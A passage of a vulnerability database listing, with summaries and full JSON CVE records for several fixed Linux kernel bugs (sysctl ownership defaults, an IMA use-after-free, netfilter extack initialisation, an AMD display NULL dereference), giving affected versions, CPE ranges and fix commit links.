                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.104",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.45",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.3",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.9.187",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.14.135",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.19.61",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.1.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.2.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsysctl: always initialize i_uid/i_gid\n\nAlways initialize i_uid/i_gid inside the sysfs core so set_ownership()\ncan safely skip setting them.\n\nCommit 5ec27ec735ba (\"fs/proc/proc_sysctl.c: fix the default values of\ni_uid/i_gid on /proc/sys inodes.\") added defaults for i_uid/i_gid when\nset_ownership() was not implemented. It also missed adjusting\nnet_ctl_set_ownership() to use the same default values in case the\ncomputation of a better value failed."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:58:05.086Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b2591c89a6e2858796111138c38fcb6851aa1955"
        },
        {
          "url": "https://git.kernel.org/stable/c/34a86adea1f2b3c3f9d864c8cce09dca644601ab"
        },
        {
          "url": "https://git.kernel.org/stable/c/1deae34db9f4f8e0e03f891be2e2e15c15c8ac05"
        },
        {
          "url": "https://git.kernel.org/stable/c/ffde3af4b29bf97d62d82e1d45275587e10a991a"
        },
        {
          "url": "https://git.kernel.org/stable/c/c7e2f43d182f5dde473389dbb39f16c9f0d64536"
        },
        {
          "url": "https://git.kernel.org/stable/c/98ca62ba9e2be5863c7d069f84f7166b45a5b2f4"
        }
      ],
      "title": "sysctl: always initialize i_uid/i_gid",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42312",
    "datePublished": "2024-08-17T09:09:16.646Z",
    "dateReserved": "2024-07-30T07:40:12.277Z",
    "dateUpdated": "2025-11-03T22:04:29.959Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-39494 (GCVE-0-2024-39494)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:20 – Updated: 2025-11-03 21:56

Title

ima: Fix use-after-free on a dentry's dname.name

Summary

In the Linux kernel, the following vulnerability has been resolved: ima: Fix use-after-free on a dentry's dname.name ->d_name.name can change on rename and the earlier value can be freed; there are conditions sufficient to stabilize it (->d_lock on dentry, ->d_lock on its parent, ->i_rwsem exclusive on the parent's inode, rename_lock), but none of those are met at any of the sites. Take a stable snapshot of the name instead.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/480afcbeb7aaaa226…
	https://git.kernel.org/stable/c/edf287bc610b18d7a…
	https://git.kernel.org/stable/c/0b31e28fbd773aefb…
	https://git.kernel.org/stable/c/7fb374981e31c193b…
	https://git.kernel.org/stable/c/dd431c3ac1fc34a92…
	https://git.kernel.org/stable/c/a78a6f0da57d058e2…
	https://git.kernel.org/stable/c/be84f32bb2c981ca6…

Impacted products

Vendor

Product

Version

Linux

Affected: 2fe5d6def1672ae6635dd71867bf36dcfaa7434b , < 480afcbeb7aaaa22677d3dd48ec590b441eaac1a (git)
Affected: 2fe5d6def1672ae6635dd71867bf36dcfaa7434b , < edf287bc610b18d7a9c0c0c1cb2e97b9348c71bb (git)
Affected: 2fe5d6def1672ae6635dd71867bf36dcfaa7434b , < 0b31e28fbd773aefb6164687e0767319b8199829 (git)
Affected: 2fe5d6def1672ae6635dd71867bf36dcfaa7434b , < 7fb374981e31c193b1152ed8d3b0a95b671330d4 (git)
Affected: 2fe5d6def1672ae6635dd71867bf36dcfaa7434b , < dd431c3ac1fc34a9268580dd59ad3e3c76b32a8c (git)
Affected: 2fe5d6def1672ae6635dd71867bf36dcfaa7434b , < a78a6f0da57d058e2009e9958fdcef66f165208c (git)
Affected: 2fe5d6def1672ae6635dd71867bf36dcfaa7434b , < be84f32bb2c981ca670922e047cdde1488b233de (git)

Linux

Affected: 3.7
Unaffected: 0 , < 3.7 (semver)
Unaffected: 5.4.291 , ≤ 5.4.* (semver)
Unaffected: 5.10.235 , ≤ 5.10.* (semver)
Unaffected: 5.15.174 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.35 , ≤ 6.6.* (semver)
Unaffected: 6.9.6 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:56:11.179Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7fb374981e31c193b1152ed8d3b0a95b671330d4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dd431c3ac1fc34a9268580dd59ad3e3c76b32a8c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a78a6f0da57d058e2009e9958fdcef66f165208c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/be84f32bb2c981ca670922e047cdde1488b233de"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00030.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-39494",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:07:29.508967Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:39.893Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "security/integrity/ima/ima_api.c",
            "security/integrity/ima/ima_template_lib.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "480afcbeb7aaaa22677d3dd48ec590b441eaac1a",
              "status": "affected",
              "version": "2fe5d6def1672ae6635dd71867bf36dcfaa7434b",
              "versionType": "git"
            },
            {
              "lessThan": "edf287bc610b18d7a9c0c0c1cb2e97b9348c71bb",
              "status": "affected",
              "version": "2fe5d6def1672ae6635dd71867bf36dcfaa7434b",
              "versionType": "git"
            },
            {
              "lessThan": "0b31e28fbd773aefb6164687e0767319b8199829",
              "status": "affected",
              "version": "2fe5d6def1672ae6635dd71867bf36dcfaa7434b",
              "versionType": "git"
            },
            {
              "lessThan": "7fb374981e31c193b1152ed8d3b0a95b671330d4",
              "status": "affected",
              "version": "2fe5d6def1672ae6635dd71867bf36dcfaa7434b",
              "versionType": "git"
            },
            {
              "lessThan": "dd431c3ac1fc34a9268580dd59ad3e3c76b32a8c",
              "status": "affected",
              "version": "2fe5d6def1672ae6635dd71867bf36dcfaa7434b",
              "versionType": "git"
            },
            {
              "lessThan": "a78a6f0da57d058e2009e9958fdcef66f165208c",
              "status": "affected",
              "version": "2fe5d6def1672ae6635dd71867bf36dcfaa7434b",
              "versionType": "git"
            },
            {
              "lessThan": "be84f32bb2c981ca670922e047cdde1488b233de",
              "status": "affected",
              "version": "2fe5d6def1672ae6635dd71867bf36dcfaa7434b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "security/integrity/ima/ima_api.c",
            "security/integrity/ima/ima_template_lib.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.7"
            },
            {
              "lessThan": "3.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.291",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.235",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.174",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.35",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.291",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.235",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.174",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.35",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.6",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nima: Fix use-after-free on a dentry\u0027s dname.name\n\n-\u003ed_name.name can change on rename and the earlier value can be freed;\nthere are conditions sufficient to stabilize it (-\u003ed_lock on dentry,\n-\u003ed_lock on its parent, -\u003ei_rwsem exclusive on the parent\u0027s inode,\nrename_lock), but none of those are met at any of the sites. Take a stable\nsnapshot of the name instead."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-21T09:12:47.376Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/480afcbeb7aaaa22677d3dd48ec590b441eaac1a"
        },
        {
          "url": "https://git.kernel.org/stable/c/edf287bc610b18d7a9c0c0c1cb2e97b9348c71bb"
        },
        {
          "url": "https://git.kernel.org/stable/c/0b31e28fbd773aefb6164687e0767319b8199829"
        },
        {
          "url": "https://git.kernel.org/stable/c/7fb374981e31c193b1152ed8d3b0a95b671330d4"
        },
        {
          "url": "https://git.kernel.org/stable/c/dd431c3ac1fc34a9268580dd59ad3e3c76b32a8c"
        },
        {
          "url": "https://git.kernel.org/stable/c/a78a6f0da57d058e2009e9958fdcef66f165208c"
        },
        {
          "url": "https://git.kernel.org/stable/c/be84f32bb2c981ca670922e047cdde1488b233de"
        }
      ],
      "title": "ima: Fix use-after-free on a dentry\u0027s dname.name",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39494",
    "datePublished": "2024-07-12T12:20:30.348Z",
    "dateReserved": "2024-06-25T14:23:23.748Z",
    "dateUpdated": "2025-11-03T21:56:11.179Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-45018 (GCVE-0-2024-45018)

Vulnerability from cvelistv5 – Published: 2024-09-11 15:13 – Updated: 2025-11-03 22:15

Title

netfilter: flowtable: initialise extack before use

Summary

In the Linux kernel, the following vulnerability has been resolved: netfilter: flowtable: initialise extack before use Fix missing initialisation of extack in flow offload.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e5ceff2196dc633c9…
	https://git.kernel.org/stable/c/356beb911b63a8cff…
	https://git.kernel.org/stable/c/7eafeec6be68ebd61…
	https://git.kernel.org/stable/c/c7b760499f7791352…
	https://git.kernel.org/stable/c/119be227bc04f5035…
	https://git.kernel.org/stable/c/e9767137308daf906…

Impacted products

Vendor

Product

Version

Linux

Affected: c29f74e0df7a02b8303bcdce93a7c0132d62577a , < e5ceff2196dc633c995afb080f6f44a72cff6e1d (git)
Affected: c29f74e0df7a02b8303bcdce93a7c0132d62577a , < 356beb911b63a8cff34cb57f755c2a2d2ee9dec7 (git)
Affected: c29f74e0df7a02b8303bcdce93a7c0132d62577a , < 7eafeec6be68ebd6140a830ce9ae68ad5b67ec78 (git)
Affected: c29f74e0df7a02b8303bcdce93a7c0132d62577a , < c7b760499f7791352b49b11667ed04b23d7f5b0f (git)
Affected: c29f74e0df7a02b8303bcdce93a7c0132d62577a , < 119be227bc04f5035efa64cb823b8a5ca5e2d1c1 (git)
Affected: c29f74e0df7a02b8303bcdce93a7c0132d62577a , < e9767137308daf906496613fd879808a07f006a2 (git)

Linux

Affected: 5.5
Unaffected: 0 , < 5.5 (semver)
Unaffected: 5.10.225 , ≤ 5.10.* (semver)
Unaffected: 5.15.166 , ≤ 5.15.* (semver)
Unaffected: 6.1.107 , ≤ 6.1.* (semver)
Unaffected: 6.6.48 , ≤ 6.6.* (semver)
Unaffected: 6.10.7 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-45018",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T15:48:48.250822Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T15:49:02.005Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:15:25.362Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_flow_table_offload.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e5ceff2196dc633c995afb080f6f44a72cff6e1d",
              "status": "affected",
              "version": "c29f74e0df7a02b8303bcdce93a7c0132d62577a",
              "versionType": "git"
            },
            {
              "lessThan": "356beb911b63a8cff34cb57f755c2a2d2ee9dec7",
              "status": "affected",
              "version": "c29f74e0df7a02b8303bcdce93a7c0132d62577a",
              "versionType": "git"
            },
            {
              "lessThan": "7eafeec6be68ebd6140a830ce9ae68ad5b67ec78",
              "status": "affected",
              "version": "c29f74e0df7a02b8303bcdce93a7c0132d62577a",
              "versionType": "git"
            },
            {
              "lessThan": "c7b760499f7791352b49b11667ed04b23d7f5b0f",
              "status": "affected",
              "version": "c29f74e0df7a02b8303bcdce93a7c0132d62577a",
              "versionType": "git"
            },
            {
              "lessThan": "119be227bc04f5035efa64cb823b8a5ca5e2d1c1",
              "status": "affected",
              "version": "c29f74e0df7a02b8303bcdce93a7c0132d62577a",
              "versionType": "git"
            },
            {
              "lessThan": "e9767137308daf906496613fd879808a07f006a2",
              "status": "affected",
              "version": "c29f74e0df7a02b8303bcdce93a7c0132d62577a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_flow_table_offload.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.5"
            },
            {
              "lessThan": "5.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.225",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.166",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.107",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.48",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.225",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.166",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.107",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.48",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.7",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: flowtable: initialise extack before use\n\nFix missing initialisation of extack in flow offload."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:31:07.596Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e5ceff2196dc633c995afb080f6f44a72cff6e1d"
        },
        {
          "url": "https://git.kernel.org/stable/c/356beb911b63a8cff34cb57f755c2a2d2ee9dec7"
        },
        {
          "url": "https://git.kernel.org/stable/c/7eafeec6be68ebd6140a830ce9ae68ad5b67ec78"
        },
        {
          "url": "https://git.kernel.org/stable/c/c7b760499f7791352b49b11667ed04b23d7f5b0f"
        },
        {
          "url": "https://git.kernel.org/stable/c/119be227bc04f5035efa64cb823b8a5ca5e2d1c1"
        },
        {
          "url": "https://git.kernel.org/stable/c/e9767137308daf906496613fd879808a07f006a2"
        }
      ],
      "title": "netfilter: flowtable: initialise extack before use",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-45018",
    "datePublished": "2024-09-11T15:13:53.297Z",
    "dateReserved": "2024-08-21T05:34:56.683Z",
    "dateUpdated": "2025-11-03T22:15:25.362Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26661 (GCVE-0-2024-26661)

Vulnerability from cvelistv5 – Published: 2024-04-02 06:22 – Updated: 2025-05-04 08:53

Title

drm/amd/display: Add NULL test for 'timing generator' in 'dcn21_set_pipe()'

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Add NULL test for 'timing generator' in 'dcn21_set_pipe()' In "u32 otg_inst = pipe_ctx->stream_res.tg->inst;" pipe_ctx->stream_res.tg could be NULL, it is relying on the caller to ensure the tg is not NULL.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476 - NULL Pointer Dereference

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/3f3c237a706580326…
	https://git.kernel.org/stable/c/39f24c08363af1cd9…
	https://git.kernel.org/stable/c/66951d98d9bf45ba2…

Impacted products

Vendor

Product

Version

Linux

Affected: 474ac4a875ca6fea3fc5183d3ad22ef7523dca53 , < 3f3c237a706580326d3b7a1b97697e5031ca4667 (git)
Affected: 474ac4a875ca6fea3fc5183d3ad22ef7523dca53 , < 39f24c08363af1cd945abad84e3c87fd3e3c845a (git)
Affected: 474ac4a875ca6fea3fc5183d3ad22ef7523dca53 , < 66951d98d9bf45ba25acf37fe0747253fafdf298 (git)

Linux

Affected: 5.9
Unaffected: 0 , < 5.9 (semver)
Unaffected: 6.6.17 , ≤ 6.6.* (semver)
Unaffected: 6.7.5 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26661",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-04-02T17:47:14.668657Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-476",
                "description": "CWE-476 NULL Pointer Dereference",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-07T19:20:51.968Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:12.654Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3f3c237a706580326d3b7a1b97697e5031ca4667"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/39f24c08363af1cd945abad84e3c87fd3e3c845a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/66951d98d9bf45ba25acf37fe0747253fafdf298"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/hwss/dcn21/dcn21_hwseq.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "3f3c237a706580326d3b7a1b97697e5031ca4667",
              "status": "affected",
              "version": "474ac4a875ca6fea3fc5183d3ad22ef7523dca53",
              "versionType": "git"
            },
            {
              "lessThan": "39f24c08363af1cd945abad84e3c87fd3e3c845a",
              "status": "affected",
              "version": "474ac4a875ca6fea3fc5183d3ad22ef7523dca53",
              "versionType": "git"
            },
            {
              "lessThan": "66951d98d9bf45ba25acf37fe0747253fafdf298",
              "status": "affected",
              "version": "474ac4a875ca6fea3fc5183d3ad22ef7523dca53",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/hwss/dcn21/dcn21_hwseq.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.9"
            },
            {
              "lessThan": "5.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.17",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.17",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.5",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Add NULL test for \u0027timing generator\u0027 in \u0027dcn21_set_pipe()\u0027\n\nIn \"u32 otg_inst = pipe_ctx-\u003estream_res.tg-\u003einst;\"\npipe_ctx-\u003estream_res.tg could be NULL, it is relying on the caller to\nensure the tg is not NULL."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:53:21.527Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/3f3c237a706580326d3b7a1b97697e5031ca4667"
        },
        {
          "url": "https://git.kernel.org/stable/c/39f24c08363af1cd945abad84e3c87fd3e3c845a"
        },
        {
